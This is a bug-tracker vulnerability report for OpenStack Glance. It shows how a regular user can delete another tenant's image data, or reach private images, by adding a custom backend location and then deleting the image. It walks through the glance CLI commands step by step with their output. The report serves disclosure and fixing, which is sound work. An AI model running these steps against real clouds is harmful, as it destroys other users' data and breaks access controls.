Comment 0 for bug 1546507

Revision history for this message
Mike Fedosin (mfedosin) wrote : Regular user can delete any image file

Any user can delete any public image data or get access to private image just knowing the image id.

Glance allows to add custom location to image and this behavior is really harmful.

Scenario of deleting image data in Ceph backend with current devstack configuration

1. User gets list of images:
mfedosin@winter ~ $ glance image-list
+--------------------------------------+----------------------------+
| ID | Name |
+--------------------------------------+----------------------------+
| 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2 |
| 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM |
| 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker |
| 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes |
+--------------------------------------+----------------------------+

2. User requests info about public image he wants to delete:
mfedosin@winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | ee1eca47dc88f4879d8a229cc70a07c6 |
| container_format | bare |
| created_at | 2016-02-11T03:38:09Z |
| direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- |
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | 2e4b6dca-9700-4715-b81d-4463cd7038de |
| min_disk | 0 |
| min_ram | 64 |
| name | TestVM |
| owner | 1c6cea59a6054372b10acbab8e25e415 |
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-11T03:38:30Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+

Optional: User may try to download image file with "glance image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg"

3. User copies direct image url: from 'direct_url' or 'locations' field
rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap

4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2)
mfedosin@winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2016-02-17T11:54:41.000000 |
| deleted | False |
| deleted_at | None |
| disk_format | qcow2 |
| id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
| is_public | False |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47cbbeab08cca9913679 |
| protected | False |
| size | 13287936 |
| status | active |
| updated_at | 2016-02-17T11:54:44.000000 |
| virtual_size | None |
+------------------+--------------------------------------+
Optional: User may try to verify that image has desired location
mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2016-02-17T11:54:41Z |
| direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- |
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47cbbeab08cca9913679 |
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-17T11:54:44Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+

5. User deletes his image. Image data will be deleted too.
glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
mfedosin@winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404)

6. Trying to access public data will failed after that.
mfedosin@winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg
curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file

HTTP/1.1 204 No Content
Date: Wed, 17 Feb 2016 12:01:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0
X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd

Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main
    args.func(client, args)
  File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download
    utils.save_image(body, args.file)
  File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image
    for chunk in data:
  File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__
    self.iterable.close()
AttributeError: 'NoneType' object has no attribute 'close'
'NoneType' object has no attribute 'close'

mfedosin@winter ~ $ glance --version
1.2.0

Affected apis:
all v1 api without any chance to fix it - v1 always allows to set custom locations.
v2 api when 'show_multiple_locations' is enabled (default - False)

Affected schemes:
All, except 'swift+config' and 'file', because custom locations are forbidden for them.

If user knows private image id he can build and set custom location to his personal image, therefore get an access to private data.